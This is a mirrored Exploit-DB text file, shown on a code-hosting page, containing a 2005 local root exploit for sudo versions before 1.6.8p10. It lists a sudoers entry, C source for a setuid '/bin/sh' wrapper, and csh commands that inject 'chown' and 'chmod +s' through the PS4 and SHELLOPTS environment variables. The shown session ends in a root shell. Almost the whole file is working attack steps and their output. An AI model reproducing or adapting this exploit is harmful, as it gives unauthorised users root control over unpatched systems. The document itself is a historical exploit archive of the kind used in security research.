bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/local/1310.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

52 lines
No EOL
949 B
Text
Raw Permalink Blame History

## Sudo local root escalation privilege ##
## vuln versions : sudo < 1.6.8p10
## by breno
## You need sudo access execution for some bash script ##
## Use csh shell to change SHELLOPTS env ##
ie:
%cat x.sh
#!/bin/bash -x
echo "Getting root!!"
%
##
##
# cat /etc/sudoers
...
breno ALL=(ALL) /home/breno/x.sh
..
#
## Let's use an egg shell :)
%cat egg.c
#include <stdio.h>
int main()
{
setuid(0);
system("/bin/sh");
}
%
% gcc -o egg egg.c
% setenv SHELLOPTS xtrace
% setenv PS4 '$(chown root:root egg)'
% sudo ./x.sh
echo Getting root!!
Getting root!!
% ls -lisa egg
1198941 8 -rwxr-xr-x 1 root root 7428 2005-11-09 13:54 egg
% setenv PS4 '$(chmod +s egg)'
% sudo ./x.sh
echo Getting root!!
Getting root!!
% ./egg
sh-3.00# id
uid=0(root) gid=1000(breno) egid=0(root) grupos=7(lp),102(lpadmin),1000(breno)
sh-3.00#
# milw0rm.com [2005-11-09]
Reference in a new issue View git blame Copy permalink